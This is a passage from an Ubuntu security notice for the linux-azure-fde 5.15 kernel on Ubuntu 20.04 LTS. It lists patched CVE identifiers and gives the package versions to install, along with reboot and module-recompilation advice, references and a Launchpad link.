CVE-2024-42077,CVE-2024-40995, CVE-2024-42105, CVE-2024-41035, CVE-2024-41097,CVE-2024-38780, CVE-2024-35247, CVE-2024-36974, CVE-2024-42070,CVE-2024-40902, CVE-2024-36972, CVE-2024-38586, CVE-2024-38573,CVE-2024-38612, CVE-2024-42121, CVE-2023-52884, CVE-2024-39276,CVE-2024-38615, CVE-2024-42095, CVE-2024-42086, CVE-2024-39507,CVE-2024-40983, CVE-2024-40943, CVE-2024-41002, CVE-2024-40958,CVE-2024-41049, CVE-2024-38596, CVE-2024-37078, CVE-2024-38637,CVE-2024-38621, CVE-2024-42153, CVE-2024-38659, CVE-2024-39468,CVE-2024-38589, CVE-2024-38587, CVE-2024-36971, CVE-2024-38599,CVE-2024-31076, CVE-2024-39490, CVE-2024-40959, CVE-2024-38634,CVE-2024-38624, CVE-2024-42240, CVE-2024-42127, CVE-2024-42102,CVE-2024-38578, CVE-2024-34027, CVE-2024-38601, CVE-2024-42087,CVE-2024-38597, CVE-2024-38591, CVE-2024-39503, CVE-2024-42236,CVE-2024-42082, CVE-2024-40956, CVE-2024-41041, CVE-2024-38580,CVE-2024-39506, CVE-2024-36894, CVE-2024-40987, CVE-2024-39475,CVE-2024-38635, CVE-2024-41007, CVE-2024-39471, CVE-2024-39467,CVE-2022-48772, CVE-2024-40934, CVE-2024-42106, CVE-2024-39469,CVE-2024-40963, CVE-2024-39482, CVE-2024-39505, CVE-2024-36014,CVE-2024-39500, CVE-2024-42096, CVE-2024-41055, CVE-2024-40937,CVE-2024-38590, CVE-2024-38610, CVE-2024-41034, CVE-2024-42115,CVE-2024-40974, CVE-2024-40968, CVE-2024-42080, CVE-2024-40957,CVE-2024-40971, CVE-2024-36032, CVE-2024-39499, CVE-2024-42137,CVE-2024-39489, CVE-2024-40976, CVE-2024-39466, CVE-2024-42145,CVE-2024-36489, CVE-2024-40980, CVE-2024-39301, CVE-2024-40905,CVE-2024-41093, CVE-2024-40912, CVE-2024-42119, CVE-2024-38588,CVE-2024-40916, CVE-2024-39488, CVE-2024-41027, CVE-2024-42068,CVE-2024-40904, CVE-2024-40961, CVE-2024-33847, CVE-2024-38555,CVE-2024-41006, CVE-2024-40929, CVE-2024-34777, CVE-2024-38627,CVE-2024-40984, CVE-2024-40990, CVE-2024-39487, CVE-2024-42098,CVE-2024-40901)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.15.0-1072-azure-fde  5.15.0-1072.81~20.04.1.1  linux-image-azure-fde           5.15.0.1072.81~20.04.1.49After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7009-2  https://ubuntu.com/security/notices/USN-7009-1  CVE-2022-48772, CVE-2023-52884, CVE-2023-52887, CVE-2024-23848,  CVE-2024-25741, CVE-2024-31076, CVE-2024-33621, CVE-2024-33847,  CVE-2024-34027, CVE-2024-34777, CVE-2024-35247, CVE-2024-36014,  CVE-2024-36015, CVE-2024-36032, CVE-2024-36270, CVE-2024-36286,  CVE-2024-36489, CVE-2024-36894, CVE-2024-36971, CVE-2024-36972,  CVE-2024-36974, CVE-2024-36978, CVE-2024-37078, CVE-2024-37356,  CVE-2024-38381, CVE-2024-38546, CVE-2024-38547, CVE-2024-38548,  CVE-2024-38549, CVE-2024-38550, CVE-2024-38552, CVE-2024-38555,  CVE-2024-38558, CVE-2024-38559, CVE-2024-38560, CVE-2024-38565,  CVE-2024-38567, CVE-2024-38571, CVE-2024-38573, CVE-2024-38578,  CVE-2024-38579, CVE-2024-38580, CVE-2024-38582, CVE-2024-38583,  CVE-2024-38586, CVE-2024-38587, CVE-2024-38588, CVE-2024-38589,  CVE-2024-38590, CVE-2024-38591, CVE-2024-38596, CVE-2024-38597,  CVE-2024-38598, CVE-2024-38599, CVE-2024-38601, CVE-2024-38605,  CVE-2024-38607, CVE-2024-38610, CVE-2024-38612, CVE-2024-38613,  CVE-2024-38615, CVE-2024-38618, CVE-2024-38619, CVE-2024-38621,  CVE-2024-38623, CVE-2024-38624, CVE-2024-38627, CVE-2024-38633,  CVE-2024-38634, CVE-2024-38635, CVE-2024-38637, CVE-2024-38659,  CVE-2024-38661, CVE-2024-38662, CVE-2024-38780, CVE-2024-39276,  CVE-2024-39277, CVE-2024-39301, CVE-2024-39466, CVE-2024-39467,  CVE-2024-39468, CVE-2024-39469, CVE-2024-39471, CVE-2024-39475,  CVE-2024-39480, CVE-2024-39482, CVE-2024-39487, CVE-2024-39488,  CVE-2024-39489, CVE-2024-39490, CVE-2024-39493, CVE-2024-39495,  CVE-2024-39499, CVE-2024-39500, CVE-2024-39501, CVE-2024-39502,  CVE-2024-39503, CVE-2024-39505, CVE-2024-39506, CVE-2024-39507,  CVE-2024-39509, CVE-2024-40901, CVE-2024-40902, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40908, CVE-2024-40911, CVE-2024-40912,  CVE-2024-40914, CVE-2024-40916, CVE-2024-40927, CVE-2024-40929,  CVE-2024-40931, CVE-2024-40932, CVE-2024-40934, CVE-2024-40937,  CVE-2024-40941, CVE-2024-40942, CVE-2024-40943, CVE-2024-40945,  CVE-2024-40954, CVE-2024-40956, CVE-2024-40957, CVE-2024-40958,  CVE-2024-40959, CVE-2024-40960, CVE-2024-40961, CVE-2024-40963,  CVE-2024-40967, CVE-2024-40968, CVE-2024-40970, CVE-2024-40971,  CVE-2024-40974, CVE-2024-40976, CVE-2024-40978, CVE-2024-40980,  CVE-2024-40981, CVE-2024-40983, CVE-2024-40984, CVE-2024-40987,  CVE-2024-40988, CVE-2024-40990, CVE-2024-40994, CVE-2024-40995,  CVE-2024-41000, CVE-2024-41002, CVE-2024-41004, CVE-2024-41005,  CVE-2024-41006, CVE-2024-41007, CVE-2024-41027, CVE-2024-41034,  CVE-2024-41035, CVE-2024-41040, CVE-2024-41041, CVE-2024-41044,  CVE-2024-41046, CVE-2024-41047, CVE-2024-41048, CVE-2024-41049,  CVE-2024-41055, CVE-2024-41087, CVE-2024-41089, CVE-2024-41092,  CVE-2024-41093, CVE-2024-41095, CVE-2024-41097, CVE-2024-42068,  CVE-2024-42070, CVE-2024-42076, CVE-2024-42077, CVE-2024-42080,  CVE-2024-42082, CVE-2024-42084, CVE-2024-42085, CVE-2024-42086,  CVE-2024-42087, CVE-2024-42089, CVE-2024-42090, CVE-2024-42092,  CVE-2024-42093, CVE-2024-42094, CVE-2024-42095, CVE-2024-42096,  CVE-2024-42097, CVE-2024-42098, CVE-2024-42101, CVE-2024-42102,  CVE-2024-42104, CVE-2024-42105, CVE-2024-42106, CVE-2024-42109,  CVE-2024-42115, CVE-2024-42119, CVE-2024-42120, CVE-2024-42121,  CVE-2024-42124, CVE-2024-42127, CVE-2024-42130, CVE-2024-42131,  CVE-2024-42137, CVE-2024-42140, CVE-2024-42145, CVE-2024-42148,  CVE-2024-42152, CVE-2024-42153, CVE-2024-42154, CVE-2024-42157,  CVE-2024-42161, CVE-2024-42223, CVE-2024-42224, CVE-2024-42225,  CVE-2024-42229, CVE-2024-42232, CVE-2024-42236, CVE-2024-42240,  CVE-2024-42244, CVE-2024-42247, CVE-2024-42270Package Information:  https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1072.81~20.04.1.1

Latest News